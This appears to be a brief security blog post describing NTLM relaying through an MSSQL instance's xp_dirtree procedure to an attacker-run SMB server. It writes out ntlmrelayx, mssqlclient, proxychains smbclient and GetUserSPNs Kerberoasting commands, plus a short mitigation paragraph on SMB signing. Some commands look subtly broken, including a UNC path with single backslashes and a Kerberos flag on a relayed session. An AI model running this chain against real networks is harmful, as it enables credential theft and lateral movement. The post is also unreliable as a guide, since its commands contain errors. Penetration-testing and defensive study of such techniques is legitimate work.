NTLM relaying is a powerful technique used in penetration testing to exploit vulnerabilities in Windows environments. If you discover a domain user with access to an MSSQL instance, you can leverage the `xp_dirtree` module to escalate privileges. This is particularly effective if the service is running under an account with high privileges over other computers, especially if the target computer does not sign SMB traffic.
Steps to Perform NTLM Relaying:
- Prepare `ntlmrelayx` with the `-socks` option against the target computer.
ntlmrelayx.py -t smb://target_ip -socks
- Use `mssqlclient.py` with the `xp_dirtree` module to connect to your SMB server using low-privileged credentials.
mssqlclient.py domain/user:password@target_ip -windows-auth
Then, execute:
EXEC xp_dirtree '\your_smb_server\share', 1, 1;
3. Use `proxychains` to authenticate at the target computer using the high-privileged account.
proxychains smbclient.py -no-pass -k target_ip
Additional Commands and Tools:
- Impacket Tools: Impacket is a collection of Python classes for working with network protocols. It includes tools like
ntlmrelayx,smbclient, andmssqlclient. - Proxychains: A tool that forces any TCP connection made by a given application to follow through a proxy.
- Kerberos Attacks: Use tools like `GetUserSPNs.py` from Impacket to perform Kerberos-based attacks.
GetUserSPNs.py domain/user:password -dc-ip domain_controller_ip -request
What Undercode Say:
NTLM relaying is a critical technique in penetration testing, especially in Windows environments. It allows attackers to move laterally across a network by exploiting weak configurations in SMB and MSSQL services. The use of tools like ntlmrelayx, mssqlclient, and `proxychains` simplifies the process of exploiting these vulnerabilities. However, it is essential to ensure that SMB signing is enabled and that service accounts are not over-privileged to mitigate such attacks.
In addition to NTLM relaying, Kerberos-based attacks like “Pass the Ticket” are also prevalent. Tools from the Impacket suite can be used to perform these attacks, but they are often detectable by modern security solutions. Therefore, attackers may use obfuscation techniques to evade detection.
For further reading on NTLM relaying and related techniques, consider the following resources:
– Impacket GitHub Repository
– Microsoft Documentation on SMB Security
– Kerberos Attacks Explained
By understanding and practicing these techniques, you can better secure your network against such attacks. Always ensure that your systems are configured securely, and regularly test your defenses to stay ahead of potential threats.
References:
Hackers Feeds, Undercode AI
